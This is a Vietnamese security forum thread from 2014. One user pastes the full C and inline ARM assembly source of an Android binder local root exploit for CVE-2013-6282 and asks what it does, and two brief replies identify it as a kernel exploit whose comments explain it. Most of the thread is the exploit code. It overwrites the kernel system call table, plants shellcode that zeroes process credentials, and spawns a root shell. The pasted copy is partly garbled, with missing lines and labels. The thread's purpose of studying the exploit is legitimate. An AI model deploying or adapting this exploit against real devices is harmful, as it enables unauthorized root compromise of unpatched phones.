[Lập trình] hỏi cách phân tích 1 exploit |
14/08/2014 12:34:41 (+0700) | #1 | 281299 |
thánh rồi
0 |
Joined: 03/08/2014 07:48:48
Bài gởi: 1
anh em có thể phân tích cho em nhiệm vụ của code này không ạ
* Just a lame binder local root exploit stub. Somewhat messy but whatever. The bug was reported in CVE-2013-6282.
* Tested on Android 4.2.2 and 4.4. Kernels 3.0.57, 3.4.5 and few more. All up to 3.4.5 unpatched should be vulnerable.
* You need to customize the addresses so that they match the target board. On Android, both /proc/kallsyms and dmesg are
* restricted, thus no automation here.
* Rigged up by Piotr Szerman. (c) 2013
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
/* Binder transaction request format */
struct binder_write_read {
signed long write_size; /* bytes to write */
signed long write_consumed; /* bytes consumed by driver */
unsigned long write_buffer;
signed long read_size; /* bytes to read */
signed long read_consumed; /* bytes consumed by driver */
unsigned long read_buffer;
} bwr;
#define BR_NOOP 0x0000720c /* binder memory write value */
#define SC_TABLE 0xc000ee28 /* system call table address */
/* we need to know the lower halfword of the original address of sys_ni_syscall to tailor MMAP_AREA and MMAP_OFF accordingly.
* you can aid yourself with a NOP block. the higher halfword will in any case become 0x720c. on one of my boxes, the other
* halfword was 0xdac4. MMAP_AREA must be aligned appropriately. you can extract all the data in question at runtime from
* /proc/kallsyms and dmesg (not that hard to set off infoleaks with this bug) as long as there are no contraints in place
#define MMAP_AREA 0x720cd000 /* userspace landing point page-aligned address. */
#define MMAP_OFF 0xac4 /* offset within it to plant the payload */
#define NUM_PAGES 16
#define PAGE_SIZE 4096
#define NOP 0xe1a00000 /* mov r0, r0 */
#define SHELL "/system/bin/sh"
#define TARGET_APERTURE 68 /* aiming for two adjacent non-implemented syscalls. check arch/arm/kernel/calls.S */
#define BINDER_WRITE_READ 0xc0186201 /* printk your BINDER_WRITE_READ */
/* the target payload */
void __attribute__((regparm(3))) shellcode(void)
asm volatile(
"push {r0-r12,lr}" "\n\t"
"mov r1, sp" "\n\t" /* calculate the process descriptor location */
"bic r2, r1, #8128" "\n\t"
"bic r2, r2, #63" "\n\t"
"ldr r3, [r2, #12]" "\n\t"
"movt r0, #0" "\n\t"
"movw r0, #0" "\n\t"
"ldr r1, [r3, #492]" "\n\t" /* cred's location may differ depending on the kernel config.
* just build and objdump a kernel module with printk(current->cred->uid)
* to find out. or pinpoint it with the help of kgdb or whatever
"mov r4, #8" "\n\t"
"sub r4, r4, #1" "\n\t"
"str r0, [r1, #4]!" "\n\t"
"teq r4, #0" "\n\t"
"bne __loop_cred" "\n\t"
"ldr r1, [r3, #488]" "\n\t" /* real_cred. overkill? */
"mov r4, #8" "\n\t"
"sub r4, r4, #1" "\n\t"
"str r0, [r1, #4]!" "\n\t"
"teq r4, #0" "\n\t"
"bne __loop_real_cred" "\n\t"
"ldm sp!, {r0-r12,pc}" "\n\t" /* return to ret_fast_syscall */
"mov pc, lr" "\n\t"
main(int ac, char **av)
char * const shell[] = { SHELL, NULL };
char *map;
int fd;
fprintf(stderr, "[!] binder local root exploit\n[!] (c) piotr szerman\n" ;
fd = open("/dev/binder", O_RDWR);
if(fd < 0)
fprintf(stderr, "[-] failed to reach out for binder. (%s)\n", strerror(errno));
if(map == (void *)-1)
perror("mmap() " ;
fprintf(stderr, "[+] userspace map area == 0x%08lx\n", (unsigned long)map);
fprintf(stderr, "[+] placing NOP block at 0x%08lx\n", (unsigned long)map);
memset(map, NOP, MMAP_OFF);
fprintf(stderr, "[+] copying payload to 0x%08lx\n", (unsigned long)map + MMAP_OFF);
/* look at the objdump of shellcode to see the correct offset */
memcpy(map + MMAP_OFF, (unsigned char *)shellcode + 8 /* offseting to the __transgressor */, 30 * sizeof(void *) /* copy all opcodes */);
fprintf(stderr, "[+] constructing rogue data structure.\n" ;
bwr.write_size = 0;
bwr.write_consumed = 0;
bwr.read_size = 1;
bwr.read_consumed = 0;
/* targeting the aperture between 2 undefined system calls in the table */
bwr.read_buffer = (unsigned long)((unsigned char *)SC_TABLE + TARGET_APERTURE * sizeof(void *) + 2);
/* calculate process descriptor address with the aid of sp:
* task_struct = *( ((unsigned long *) ( (sp & ~(0xbf000000 - 1)) & ~0x3f )) + 3);
ioctl(fd, BINDER_WRITE_READ, &bwr);
sleep(5); /* give binder ample time to service the transaction. if it's under heavy load, the exploit might fail */
fprintf(stderr, "[+] r00ting device...\n\n" ;
asm volatile(
"mov r7, %0\n\t"
"swi 0\n\t"
execve(shell[0], shell, NULL);
return EXIT_FAILURE; |
[Lập trình] hỏi cách phân tích 1 exploit |
14/08/2014 19:19:12 (+0700) | #2 | 281303 |
![[Avatar] [Avatar]](/hvaonline/images/avatar/a4ca1100faffa41e83c66050b25d216c.jpg)
0 |
Joined: 03/07/2010 02:38:47
Bài gởi: 63
Đến từ: Thuỷ điện Hoà Bình
Một kernel exploit dành cho Android, code được viết trong ngôn ngữ C, và inline Assembly, code có thể được dịch bởi GCC, phần description được viết bằng tiếng |
Được phục vụ cho tổ quốc, đó là một niềm vinh hạnh lớn lao.. |
[Lập trình] hỏi cách phân tích 1 exploit |
16/08/2014 02:47:54 (+0700) | #3 | 281319 |
0 |
Joined: 21/03/2014 06:42:47
Bài gởi: 24
Các comment của họ đã giải thích nghĩa của đoạn code tương đối đầy đủ. Không biết bạn chưa hiểu đoạn nào?. |
Mình là 1 con gà trong công nghệ.
Nếu mình có nói gì làm bạn không vui thì mong bạn bỏ qua cho, vì cá nhân mình còn gà lắm, và mình có ý tốt thôi. |
Các thành viên đang hiện diện ở đây |
1 Khách
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©